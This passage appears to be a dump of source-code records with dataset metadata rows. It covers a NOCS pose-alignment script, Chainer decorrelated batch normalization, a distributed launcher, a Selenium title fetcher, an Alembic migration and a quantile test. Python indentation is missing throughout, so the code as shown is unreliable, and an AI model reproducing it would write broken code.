depth_points = np.asarray(depth_pcd.points)
depth_points = depth_points - np.mean(depth_points, axis=0)
depth_pcd.points = o3d.utility.Vector3dVector(depth_points)
# Get the nocs point cloud
nocs_pcd = visualize_nocs_map(nocs, nocs, mask=mask)
nocs_points = np.asarray(nocs_pcd.points) - 0.5
nocs_pcd.points = o3d.utility.Vector3dVector(nocs_points)
# Estimate Umeyama Alignment
Scales, Rotation, Translation, OutTransform = estimateSimilarityUmeyama(nocs_points.T, depth_points.T)
# ICP Alignment
reg_p2p = o3d.registration.registration_icp(
depth_pcd, nocs_pcd, 0.2, OutTransform,
o3d.registration.TransformationEstimationPointToPoint())
# draw_registration_result(depth_pcd, nocs_pcd, reg_p2p.transformation)
# print("GT: ", reg_p2p.transformation)
gt_transform = reg_p2p.transformation
###########################################################################################################33
# Read the color image
image_view = cv2.imread(pred_color[i])
image_view = cv2.cvtColor(image_view, cv2.COLOR_BGR2RGB) / 255.0
image = cv2.resize(image_view, (640, 480))
# Read the depth image
depth = imageio.imread(pred_depth[i])#[:, :, 0]
# Read the nocs image
nocs = read_image(pred_nocs[i])
# Get the mask
mask = generate_mask_NOCS(nocs)
# Get the nocs point cloud
nocs_pcd = visualize_nocs_map(nocs, nocs, mask=mask)
nocs_points = np.asarray(nocs_pcd.points) - 0.5
# Get the depth point cloud
# depth_point_cloud, depth_pcd = save_point_cloud(K, image, mask, depth, num=0, output_directory='./',depth_tiff=1)
depth_pcd_file = pred_ply[i]
depth_pcd = o3d.io.read_point_cloud(depth_pcd_file)
depth_points = np.asarray(depth_pcd.points)
depth_points = depth_points - np.mean(depth_points, axis=0)
m_dim = len(nocs_points)
if len(depth_points) < m_dim:
m_dim = len(depth_points)
nocs_points = nocs_points[:m_dim, :]
depth_points = depth_points[:m_dim, :]
nocs_pcd.points = o3d.utility.Vector3dVector(nocs_points)
depth_pcd.points = o3d.utility.Vector3dVector(depth_points)
# Estimate Umeyama Alignment
Scales, Rotation, Translation, OutTransform = estimateSimilarityUmeyama(nocs_points.T, depth_points.T)
depth_pcd.points = o3d.utility.Vector3dVector(depth_points)
# draw_registration_result(depth_pcd, nocs_pcd, OutTransform)
# ICP Alignment
reg_p2p = o3d.registration.registration_icp(
depth_pcd, nocs_pcd, 0.2, OutTransform,
o3d.registration.TransformationEstimationPointToPoint())
pred_transform = reg_p2p.transformation
# draw_registration_result(depth_pcd, nocs_pcd, reg_p2p.transformation)
unit_vec = np.ones((3,1))
unit_vec /= np.linalg.norm(unit_vec)
print("Unit Vec", unit_vec)
gt_rot = gt_transform[:3,:3]
pred_rot = pred_transform[:3,:3]
print(gt_rot)
print(pred_rot)
gt_vec = np.squeeze((gt_rot @ unit_vec).T)
pred_vec = np.squeeze((pred_rot @ unit_vec).T)
print(f"gt_vec {gt_vec}")
print(f"pred_vec {pred_vec}")
d_prod = np.dot(gt_vec, pred_vec) / (np.linalg.norm(gt_vec) * np.linalg.norm(pred_vec))
coss.append( np.degrees(np.arccos(d_prod)))
print("Cos", np.degrees(np.arccos(d_prod)))
fig = plt.figure(constrained_layout=True, figsize=(16,8))
gs = GridSpec(1, 1, figure=fig)
ax2 = fig.add_subplot(gs[0, 0])
ax2.hist(coss, 20, density=False, histtype='stepfilled', facecolor='orange', alpha=0.75)
ax2.set_title("mAP")
ax2.set_xlabel("Degree")
ax2.set_ylabel("Frequency")
plt.savefig(f"mAP Cars.png")
coss_temp = np.array(coss)
print("Mean:",np.mean(coss_temp, axis=0))
print("StD:",np.std(coss_temp, axis=0))
coss = np.array(coss)
print("Mean:",np.mean(coss, axis=0))
print("StD:",np.std(coss, axis=0))
fig = plt.figure(constrained_layout=True, figsize=(16,8))
gs = GridSpec(1, 1, figure=fig)
ax2 = fig.add_subplot(gs[0, 0])
ax2.hist(coss, 20, density=False, histtype='stepfilled', facecolor='orange', alpha=0.75)
ax2.set_title("mAP")
ax2.set_xlabel("Degree")
ax2.set_ylabel("Frequency")
plt.savefig(f"mAP Cars.png")
| 32.097938 | 165 | 0.599004 | 1,707 | 12,454 | 4.187463 | 0.175747 | 0.018607 | 0.019586 | 0.029379 | 0.467403 | 0.451875 | 0.433548 | 0.390459 | 0.340235 | 0.325126 | 0 | 0.04789 | 0.252208 | 12,454 | 387 | 166 | 32.180879 | 0.719639 | 0.126626 | 0 | 0.202586 | 0 | 0 | 0.085179 | 0.059078 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043103 | false | 0 | 0.086207 | 0 | 0.163793 | 0.043103 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3e10b13128ce93e6e6559d8e9d45993251f9fca | 10,440 | py | Python | chainer/functions/normalization/decorrelated_batch_normalization.py | zaltoprofen/chainer | 3b03f9afc80fd67f65d5e0395ef199e9506b6ee1 | [
"MIT"
] | 2 | 2019-08-12T21:48:04.000Z | 2020-08-27T18:04:20.000Z | chainer/functions/normalization/decorrelated_batch_normalization.py | zaltoprofen/chainer | 3b03f9afc80fd67f65d5e0395ef199e9506b6ee1 | [
"MIT"
] | null | null | null | chainer/functions/normalization/decorrelated_batch_normalization.py | zaltoprofen/chainer | 3b03f9afc80fd67f65d5e0395ef199e9506b6ee1 | [
"MIT"
] | 2 | 2019-07-16T00:24:47.000Z | 2021-02-26T10:27:27.000Z | from chainer import backend
from chainer import function_node
from chainer.utils import argument
from chainer.utils import type_check
def _calc_axis_and_m(x_shape, batch_size, groups):
m = batch_size * groups
spatial_ndim = len(x_shape) - 2
spatial_axis = tuple(range(2, 2 + spatial_ndim))
for i in spatial_axis:
m *= x_shape[i]
return spatial_axis, m
class DecorrelatedBatchNormalization(function_node.FunctionNode):
def __init__(self, groups=16, eps=2e-5, mean=None, projection=None,
decay=0.9):
self.groups = groups
self.running_mean = mean
self.running_projection = projection
self.eps = eps
self.decay = decay
self.axis = None
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 1)
x_type = in_types[0]
type_check.expect(
x_type.dtype.kind == 'f',
x_type.shape[1] % self.groups == 0,
)
type_check.expect(
x_type.ndim >= 2,
)
def forward(self, inputs):
self.retain_inputs(())
x = inputs[0]
xp = backend.get_array_module(x)
x_shape = x.shape
b, c = x_shape[:2]
g = self.groups
C = c // g
spatial_axis, m = _calc_axis_and_m(x_shape, b, g)
if g > 1:
x = x.reshape((b * g, C) + x.shape[2:])
x_hat = x.transpose((1, 0) + spatial_axis).reshape(C, -1)
mean = x_hat.mean(axis=1)
x_hat = x_hat - mean[:, None]
self.eps = x.dtype.type(self.eps)
eps_matrix = self.eps * xp.eye(C, dtype=x.dtype)
cov = x_hat.dot(x_hat.T) / x.dtype.type(m) + eps_matrix
self.eigvals, self.eigvectors = xp.linalg.eigh(cov)
U = xp.diag(self.eigvals ** -0.5).dot(self.eigvectors.T)
self.y_hat_pca = U.dot(x_hat) # PCA whitening
y_hat = self.eigvectors.dot(self.y_hat_pca) # ZCA whitening
y = y_hat.reshape((C, b * g,) + x.shape[2:]).transpose(
(1, 0) + spatial_axis)
if self.groups > 1:
y = y.reshape((-1, c) + x.shape[2:])
# Update running statistics
if self.running_mean is not None:
self.running_mean *= self.decay
self.running_mean += (1 - self.decay) * mean
if self.running_projection is not None:
adjust = m / max(m - 1., 1.) # unbiased estimation
self.running_projection *= self.decay
projection = self.eigvectors.dot(U)
self.running_projection += (1 - self.decay) * adjust * projection
return y,
def backward(self, indexes, grad_outputs):
gy, = grad_outputs
f = DecorrelatedBatchNormalizationGrad(
self.groups, self.eigvals, self.eigvectors, self.y_hat_pca)
return f.apply((gy,))
class DecorrelatedBatchNormalizationGrad(function_node.FunctionNode):
def __init__(self, groups, eigvals, eigvectors, y_hat_pca):
self.groups = groups
self.eigvals = eigvals
self.eigvectors = eigvectors
self.y_hat_pca = y_hat_pca
def forward(self, inputs):
self.retain_inputs(())
gy = inputs[0]
xp = backend.get_array_module(gy)
gy_shape = gy.shape
b, c = gy_shape[:2]
g = self.groups
C = c // g
spatial_axis, m = _calc_axis_and_m(gy_shape, b, g)
if g > 1:
gy = gy.reshape((b * g, C) + gy.shape[2:])
gy_hat = gy.transpose((1, 0) + spatial_axis).reshape(C, -1)
eigvectors = self.eigvectors
eigvals = self.eigvals
y_hat_pca = self.y_hat_pca
gy_hat_pca = eigvectors.T.dot(gy_hat)
f = gy_hat_pca.mean(axis=1)
K = eigvals[:, None] - eigvals[None, :]
valid = K != 0
K[valid] = 1 / K[valid]
xp.fill_diagonal(K, 0)
V = xp.diag(eigvals)
V_sqrt = xp.diag(eigvals ** 0.5)
V_invsqrt = xp.diag(eigvals ** -0.5)
F_c = gy_hat_pca.dot(y_hat_pca.T) / gy.dtype.type(m)
M = xp.diag(xp.diag(F_c))
mat = K.T * (V.dot(F_c.T) + V_sqrt.dot(F_c).dot(V_sqrt))
S = mat + mat.T
R = gy_hat_pca - f[:, None] + (S - M).T.dot(y_hat_pca)
gx_hat = R.T.dot(V_invsqrt).dot(eigvectors.T).T
gx = gx_hat.reshape((C, b * g,) + gy.shape[2:]).transpose(
(1, 0) + spatial_axis)
if g > 1:
gx = gx.reshape((-1, c, ) + gy.shape[2:])
self.retain_outputs(())
return gx,
def backward(self, inputs, grad_outputs):
# TODO(crcrpar): Implement this.
raise NotImplementedError('Double backward is not implemented for'
' decorrelated batch normalization.')
class FixedDecorrelatedBatchNormalization(function_node.FunctionNode):
def __init__(self, groups):
self.groups = groups
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 3)
x_type, mean_type, var_type = in_types
type_check.expect(
x_type.dtype.kind == 'f',
mean_type.dtype == x_type.dtype,
var_type.dtype == x_type.dtype,
)
type_check.expect(
x_type.ndim >= 2,
)
def forward(self, inputs):
self.retain_inputs((0, 1, 2))
x, mean, projection = inputs
x_shape = x.shape
b, c = x_shape[:2]
g = self.groups
C = c // g
spatial_axis, m = _calc_axis_and_m(x_shape, b, g)
if g > 1:
x = x.reshape((b * g, C) + x.shape[2:])
x_hat = x.transpose((1, 0) + spatial_axis).reshape(C, -1)
y_hat = projection.dot(x_hat - mean[:, None])
y = y_hat.reshape((C, b * g) + x.shape[2:]).transpose(
(1, 0) + spatial_axis)
if g > 1:
y = y.reshape((-1, c) + x.shape[2:])
return y,
def backward(self, indexes, grad_outputs):
x, mean, projection = self.get_retained_inputs()
gy, = grad_outputs
f = FixedDecorrelatedBatchNormalizationGrad(self.groups)
return f.apply((x, mean, projection, gy))
class FixedDecorrelatedBatchNormalizationGrad(function_node.FunctionNode):
def __init__(self, groups):
self.groups = groups
def forward(self, inputs):
self.retain_inputs(())
x, mean, projection, gy = inputs
gy_shape = gy.shape
b, c = gy_shape[:2]
g = self.groups
C = c // g
spatial_axis, m = _calc_axis_and_m(gy_shape, b, g)
if g > 1:
gy = gy.reshape((b * g, C) + gy.shape[2:])
x = x.reshape((b * g, C) + x.shape[2:])
x_hat = x.transpose((1, 0) + spatial_axis).reshape(C, -1)
gy_hat = gy.transpose((1, 0) + spatial_axis).reshape(C, -1)
gy_hat_pca = projection.T.dot(gy_hat)
gx = gy_hat_pca.reshape(
(C, b * g) + gy.shape[2:]).transpose((1, 0) + spatial_axis)
if g > 1:
gx = gx.reshape((-1, c) + gy.shape[2:])
rhs = x_hat - mean[Ellipsis, None]
gprojection = (x_hat - rhs).T.dot(gy_hat)
gmean = -gx[:, 0]
self.retain_outputs(())
return gx, gmean, gprojection
def backward(self, inputs, grad_outputs):
# TODO(crcrpar): Implement this.
raise NotImplementedError('Double backward is not implemented for'
' fixed decorrelated batch normalization.')
def decorrelated_batch_normalization(x, **kwargs):
"""decorrelated_batch_normalization(x, *, groups=16, eps=2e-5, \
running_mean=None, running_projection=None, decay=0.9)
Decorrelated batch normalization function.
It takes the input variable ``x`` and normalizes it using
batch statistics to make the output zero-mean and decorrelated.
Args:
x (:class:`~chainer.Variable`): Input variable.
groups (int): Number of groups to use for group whitening.
eps (float): Epsilon value for numerical stability.
running_mean (:ref:`ndarray`): Expected value of the mean. This is a
running average of the mean over several mini-batches using
the decay parameter. If ``None``, the expected mean is initialized
to zero.
running_projection (:ref:`ndarray`):
Expected value of the project matrix. This is a
running average of the projection over several mini-batches using
the decay parameter. If ``None``, the expected projected is
initialized to the identity matrix.
decay (float): Decay rate of moving average. It is used during
training.
Returns:
~chainer.Variable: The output variable which has the same shape as
:math:`x`.
See: `Decorrelated Batch Normalization <https://arxiv.org/abs/1804.08450>`_
.. seealso:: :class:`~chainer.links.DecorrelatedBatchNormalization`
"""
groups, eps, running_mean, running_projection, decay = \
argument.parse_kwargs(
kwargs, ('groups', 16), ('eps', 2e-5), ('running_mean', None),
('running_projection', None), ('decay', 0.9))
f = DecorrelatedBatchNormalization(
groups, eps, running_mean, running_projection, decay)
return f.apply((x,))[0]
def fixed_decorrelated_batch_normalization(x, mean, projection, groups=16):
"""Decorrelated batch normalization function with fixed statistics.
This is a variant of decorrelated batch normalization, where the mean and
projection statistics are given by the caller as fixed variables. This is
used in testing mode of the decorrelated batch normalization layer, where
batch statistics cannot be used for prediction consistency.
Args:
x (:class:`~chainer.Variable`): Input variable.
mean (:class:`~chainer.Variable` or :ref:`ndarray`):
Shifting parameter of input.
projection (:class:`~chainer.Variable` or :ref:`ndarray`):
Projection matrix for decorrelation of input.
groups (int): Number of groups to use for group whitening.
Returns:
~chainer.Variable: The output variable which has the same shape as
:math:`x`.
.. seealso::
:func:`~chainer.functions.decorrelated_batch_normalization`,
:class:`~chainer.links.DecorrelatedBatchNormalization`
"""
f = FixedDecorrelatedBatchNormalization(groups)
return f.apply((x, mean, projection))[0]
| 34.569536 | 79 | 0.597126 | 1,394 | 10,440 | 4.314204 | 0.147059 | 0.017958 | 0.054872 | 0.026937 | 0.483538 | 0.450449 | 0.42717 | 0.365314 | 0.312271 | 0.306119 | 0 | 0.015259 | 0.284387 | 10,440 | 301 | 80 | 34.684385 | 0.78972 | 0.225287 | 0 | 0.405263 | 0 | 0 | 0.024816 | 0 | 0 | 0 | 0 | 0.003322 | 0 | 1 | 0.089474 | false | 0 | 0.021053 | 0 | 0.178947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3e51e1c2ad25822aeffab799695aee3ded4fa23 | 5,857 | py | Python | ml/app.py | necla-ml/ml | 7ebd29382326e3958297607da7182c211865e7ff | [
"BSD-3-Clause"
] | 1 | 2022-02-21T21:06:29.000Z | 2022-02-21T21:06:29.000Z | ml/app.py | necla-ml/ml | 7ebd29382326e3958297607da7182c211865e7ff | [
"BSD-3-Clause"
] | null | null | null | ml/app.py | necla-ml/ml | 7ebd29382326e3958297607da7182c211865e7ff | [
"BSD-3-Clause"
] | null | null | null | import os, sys
import subprocess
from pathlib import Path
import ml
from ml import (
cuda,
distributed as dist,
multiprocessing as mp,
random,
utils,
logging,)
def init_cuda(cfg):
if cfg.no_gpu:
# No use of GPU
cfg.gpu = []
os.environ['CUDA_VISIBLE_DEVICES'] = 'NoDevFiles'
else:
if cfg.gpu is None:
# Set CUDA Visible GPUs if any
if 'CUDA_VISIBLE_DEVICES' in os.environ and os.environ['CUDA_VISIBLE_DEVICES'] != 'NoDevFiles':
cfg.gpu = sorted(map(int, os.environ['CUDA_VISIBLE_DEVICES'].split(',')))
else:
cfg.gpu = list(range(cuda.device_count()))
os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(sorted(map(str, cfg.gpu)))
def init(cfg):
init_cuda(cfg)
random.seed(cfg.seed, deterministic=cfg.deterministic)
if (cfg.logging or cfg.daemon) and cfg.logfile is None:
from __main__ import __file__ as script
cfg.logging = True
name = Path(script).stem
if cfg.rank < 0:
cfg.logfile = f"{name}-{os.getpid()}.log"
else:
cfg.logfile = f"{name}-{os.getpid()}_{cfg.rank}.log"
if cfg.logfile:
logging.info(f"Logging to {cfg.logfile}")
logging.basicConfig(filename=cfg.logfile, rank=cfg.rank, world_size=cfg.world_size)
else:
logging.basicConfig(stream=sys.stdout, rank=cfg.rank, world_size=cfg.world_size)
if cfg.dist:
if cfg.world_size > 1:
dist.init_process_group(init_method=cfg.dist_url, backend=cfg.dist_backend, rank=cfg.rank, world_size=cfg.world_size)
logging.info(f"[{cfg.rank}/{cfg.world_size}] '{dist.hostname()}' distributed with {cfg.dist_backend} using {cfg.dist_url}")
for key in ['MASTER_ADDR', 'MASTER_PORT', 'WORLD_SIZE', 'CUDA_VISIBLE_DEVICES']:
if key in os.environ:
logging.info(f"[{cfg.rank}/{cfg.world_size}] {key}: {os.environ[key]}")
else:
logging.info(f"HOST: {dist.hostname()} w/o distributed communication")
def exec(main, cfg, *args, **kwargs):
if cfg.daemon:
if sys.stdin and sys.__stdin__ and sys.__stdin__.closed:
sys.__stdin__ = sys.stdin
from daemon import daemon
with daemon.DaemonContext(umask=0o022,
chroot_directory=None,
working_directory=os.getcwd(),
stdout=sys.stdout,
stderr=sys.stderr,
) as ctx:
init(cfg)
with open(cfg.logfile, 'a') as log:
# XXX redirect stdout in case of existing print()
daemon.redirect_stream(ctx.stdout, log)
daemon.redirect_stream(ctx.stderr, log)
main(cfg, *args, **kwargs)
else:
init(cfg)
main(cfg, *args, **kwargs)
def launch(rank, main, cfg, args, kwargs):
# New GPU worker proc
assert rank >= 0
assert cfg.world_size > 0
assert cfg.dist
cfg.rank = rank
if cfg.dist == 'torch':
# NOTE launched with init_cuda()
if cfg.gpu:
# single node rank -> local GPU index
cfg.gpu = [cfg.gpu[rank]]
logging.info(f"[{rank}/{cfg.world_size}]({dist.hostname()}) {utils.get_num_threads()} cores) w/ CUDA_VISIBLE_DEVICES={os.environ['CUDA_VISIBLE_DEVICES']}")
else:
logging.info(f"[{rank}/{cfg.world_size}]({dist.hostname()}) {utils.get_num_threads()} cores)")
elif cfg.dist == 'slurm':
# NOTE launched w/o CUDA initialization yet
assert cfg.gpu is None
assert 'CUDA_VISIBLE_DEVICES' in os.environ
if os.environ['CUDA_VISIBLE_DEVICES'] == 'NoDevFiles':
logging.info(f"[{rank}/{cfg.world_size}]({dist.hostname()}/{dist.slurm_master()} w/ {utils.get_num_threads()} cores)")
else:
# global rank -> local visible GPU(s) instead of absolute SLURM_JOB_GPUS
devices = list(map(int, os.environ['CUDA_VISIBLE_DEVICES'].split(',')))
cfg.gpu = [devices[cfg.rank % cfg.slurm_ntasks_per_node]]
logging.info(f"[{rank}/{cfg.world_size}]({dist.hostname()}/{dist.slurm_master()} w/ {utils.get_num_threads()} cores) CUDA_VISIBLE_DEVICES={os.environ['CUDA_VISIBLE_DEVICES']}")
exec(main, cfg, *args, **kwargs)
def run(main, cfg, *args, **kwargs):
if cfg.dist:
if cfg.rank < 0:
# Launch distributed workers to assign ranks
if cfg.dist == "torch":
# spawn one proc per GPU over available locally
assert cfg.world_size < 0, f"PyTorch distributed world is subject to available local GPUs"
init_cuda(cfg)
cfg.world_size = len(cfg.gpu)
os.environ['MASTER_ADDR'] = dist.hostname()
os.environ['MASTER_PORT'] = str(cfg.dist_port)
os.environ['WORLD_SIZE'] = str(cfg.world_size)
return mp.start_processes(launch, args=(main, cfg, args, kwargs), nprocs=cfg.world_size, daemon=False, join=True, start_method='fork')
elif cfg.dist == "slurm":
if 'SLURM_PROCID' not in os.environ:
# first time to sbatch with specified resource allocation
return dist.slurm_sbatch(cfg)
else:
# launched by SLURM on some (GPU) node
dist.slurm_init(cfg, *args, **kwargs)
return launch(cfg.rank, main, cfg, args, kwargs)
else:
raise ValueError(f"Unsupported distributed mode: {cfg.dist}")
else:
assert False, f"Rank must not be set manually"
else:
# Local worker with cfg.gpu
exec(main, cfg, *args, **kwargs) | 44.371212 | 188 | 0.583575 | 742 | 5,857 | 4.459569 | 0.233154 | 0.054397 | 0.054397 | 0.046238 | 0.3424 | 0.265639 | 0.183741 | 0.183741 | 0.085827 | 0.085827 | 0 | 0.002414 | 0.292641 | 5,857 | 132 | 189 | 44.371212 | 0.796283 | 0.085026 | 0 | 0.218182 | 0 | 0.036364 | 0.227086 | 0.102694 | 0 | 0 | 0 | 0 | 0.063636 | 1 | 0.045455 | false | 0 | 0.063636 | 0 | 0.136364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3e59a34da2419eebef779ae17ec337eb9356b63 | 2,497 | py | Python | sopel-homedirectory/modules/lib/gettitle.py | kunwon1/subtitle-selenium | 9af8c08d5f30cf0734a65cad79a6ac98a2647124 | [
"MIT"
] | null | null | null | sopel-homedirectory/modules/lib/gettitle.py | kunwon1/subtitle-selenium | 9af8c08d5f30cf0734a65cad79a6ac98a2647124 | [
"MIT"
] | null | null | null | sopel-homedirectory/modules/lib/gettitle.py | kunwon1/subtitle-selenium | 9af8c08d5f30cf0734a65cad79a6ac98a2647124 | [
"MIT"
] | null | null | null | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from pyvirtualdisplay import Display
import urllib3.exceptions
import traceback
import string
import time
import re
printable = set(string.printable)
class Titler:
def __init__(self):
options = webdriver.ChromeOptions()
self.display = Display(visible=0, size=(1920, 1080))
self.display.start()
options.add_argument('window-size=1200x600')
self.driver = webdriver.Chrome(options = options)
self.driver.implicitly_wait(5)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if self.driver:
self.driver.quit()
if self.display:
self.display.stop()
def GetTitle(self, url):
url = ''.join(filter(lambda x: x in printable, url))
title = False
try:
self.driver.get(url)
# WebDriverWait(self.driver, 10).until(
# lambda driver: driver.execute_script('return document.readyState') == 'complete'
# )
time.sleep(1)
if 'twitter.com' in url:
time.sleep(3)
title = WebDriverWait(self.driver, 10).until(
TitleContainsText()
)
except urllib3.exceptions.HTTPError:
pass
except Exception as exc:
print(traceback.format_exc())
print(exc)
return title
class TitleContainsText(object):
def __call__(self, driver):
title = driver.title
if re.match(r'[\S]+', title) is not None:
return title
else:
return False
if __name__ == '__main__':
with Titler() as titler:
t = titler.GetTitle('https://google.com')
print(t)
t = titler.GetTitle('http://bcfhkdlnmvrstwzx.neverssl.com/online')
print(t)
t = titler.GetTitle('https://www.nytimes.com/2019/10/31/us/keystone-pipeline-leak.html')
print(t)
t = titler.GetTitle('https://www.washingtonpost.com/world/asia_pacific/chinese-official-to-us-after-limits-put-on-its-journalists-lets-play/2020/03/03/fed674d8-5d34-11ea-ac50-18701e14e06d_story.html')
print(t)
t = titler.GetTitle('https://twitter.com/TessaDuvall/status/1234960398631219200')
print(t)
print('OK')
| 30.82716 | 208 | 0.62515 | 289 | 2,497 | 5.287197 | 0.480969 | 0.052356 | 0.049084 | 0.052356 | 0.11322 | 0.060209 | 0.060209 | 0 | 0 | 0 | 0 | 0.043549 | 0.264317 | 2,497 | 80 | 209 | 31.2125 | 0.788242 | 0.060072 | 0 | 0.111111 | 0 | 0.031746 | 0.174603 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.079365 | false | 0.015873 | 0.15873 | 0.015873 | 0.333333 | 0.15873 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3e644d9272bdc05c07609d43e1cf04ff2a64a5c | 769 | py | Python | carpyncho/migrations/versions/19e8e023f5fb_remove_enum_from_tile.py | toros-astro/carpyncho3 | 27b00e7539e081c563f1a09c70fb255ac5e71583 | [
"BSD-3-Clause"
] | 1 | 2016-02-16T11:10:52.000Z | 2016-02-16T11:10:52.000Z | carpyncho/migrations/versions/19e8e023f5fb_remove_enum_from_tile.py | toros-astro/carpyncho3 | 27b00e7539e081c563f1a09c70fb255ac5e71583 | [
"BSD-3-Clause"
] | null | null | null | carpyncho/migrations/versions/19e8e023f5fb_remove_enum_from_tile.py | toros-astro/carpyncho3 | 27b00e7539e081c563f1a09c70fb255ac5e71583 | [
"BSD-3-Clause"
] | null | null | null | """remove enum from tile
Revision ID: 19e8e023f5fb
Revises: cf2e08638e84
Create Date: 2018-08-23 12:43:31.403270
"""
# revision identifiers, used by Alembic.
revision = '19e8e023f5fb'
down_revision = 'cf2e08638e84'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('Tile', 'status')
op.add_column('Tile', sa.Column('status', sa.String(255), nullable=False, default="raw"))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('Tile', sa.Column('status', sa.String(255), nullable=False, default="raw"))
# ### end Alembic commands ###
| 24.806452 | 93 | 0.687906 | 99 | 769 | 5.282828 | 0.525253 | 0.051625 | 0.080306 | 0.087954 | 0.474187 | 0.474187 | 0.474187 | 0.474187 | 0.309751 | 0.309751 | 0 | 0.087227 | 0.16515 | 769 | 30 | 94 | 25.633333 | 0.727414 | 0.394018 | 0 | 0.181818 | 0 | 0 | 0.13986 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.181818 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3e8a25b886e2dd3e93fc2e6fa0f2a2bcc470b21 | 2,224 | py | Python | tests/test_wquantile.py | nailbiter/alex_python_toolbox | e9624db00f5dc3c1a83b87bc267eff1e3f96aea5 | [
"MIT"
] | null | null | null | tests/test_wquantile.py | nailbiter/alex_python_toolbox | e9624db00f5dc3c1a83b87bc267eff1e3f96aea5 | [
"MIT"
] | 1 | 2021-11-15T23:18:39.000Z | 2021-11-15T23:18:39.000Z | tests/test_wquantile.py | nailbiter/alex_python_toolbox | e9624db00f5dc3c1a83b87bc267eff1e3f96aea5 | [
"MIT"
] | null | null | null | """===============================================================================
FILE: tests/test_wquantile.py
USAGE: (not intended to be directly executed)
DESCRIPTION:
OPTIONS: ---
REQUIREMENTS: ---
BUGS: ---
NOTES: ---
AUTHOR: Alex Leontiev (nailbiter@dtws-work.in)
ORGANIZATION: Datawise Inc.
VERSION: ---
CREATED: 2020-11-13T10:34:23.399352
REVISION: ---
==============================================================================="""
import logging
import unittest
from alex_python_toolbox.wquantile import wquantile
from random import uniform
import pandas as pd
import json
from os import path
class TestWquantile(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._logger = logging.getLogger(self.__class__.__name__)
_TEST_DATA_FN = path.join(path.dirname(
__file__), ".test_wquantile.data.json")
def _generate_random_test_data(self, test_cases_num=5, quantile_trials=10):
num_rows = int(uniform(5, 15))
res = []
for i in range(test_cases_num):
df = pd.DataFrame(
[{"value": int(uniform(5, 15)), "weight": uniform(5, 15)} for j in range(num_rows)])
quantiles = [uniform(0, 1) for i in range(quantile_trials)]
res.append({"df": df.to_dict(), "data": [{"quantile": quantile,
"res": wquantile(zip(df["value"], df["weight"]), [quantile])} for quantile in quantiles]})
with open(TestWquantile._TEST_DATA_FN, "w") as f:
json.dump(res, f, indent=2, sort_keys=True)
def test_wquantile(self):
# self._generate_random_test_data()
with open(TestWquantile._TEST_DATA_FN) as f:
test_data = json.load(f)
for r in test_data:
#self.assertEqual(wquantile(pd.DataFrame({"value":r["df"]["value"],"weight":r["df"]["weight"]}),q=r["quantile"]), r["res"])
res = wquantile(zip(r["df"]["value"].values(), r["df"]["weight"].values()), [
r_["quantile"] for r_ in r["data"]])
self.assertListEqual(res, [r_["res"] for r_ in r["data"]])
| 37.694915 | 144 | 0.553507 | 260 | 2,224 | 4.507692 | 0.411538 | 0.047782 | 0.025597 | 0.037543 | 0.071672 | 0.052901 | 0 | 0 | 0 | 0 | 0 | 0.020528 | 0.233363 | 2,224 | 58 | 145 | 38.344828 | 0.666862 | 0.294964 | 0 | 0 | 0 | 0 | 0.063421 | 0.016015 | 0 | 0 | 0 | 0 | 0.032258 | 1 | 0.096774 | false | 0 | 0.225806 | 0 | 0.387097 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3ed1e109e8b2ec28f7a697722de818e6a4cde1f | 912 | py | Python | prepare.py | mukherjeeakash/GestureRecognizer | 51c16c9b7c2d32fc6cdcc90bd251f7b131b9e821 | [
"Apache-2.0"
] | null | null | null | prepare.py | mukherjeeakash/GestureRecognizer | 51c16c9b7c2d32fc6cdcc90bd251f7b131b9e821 | [
"Apache-2.0"
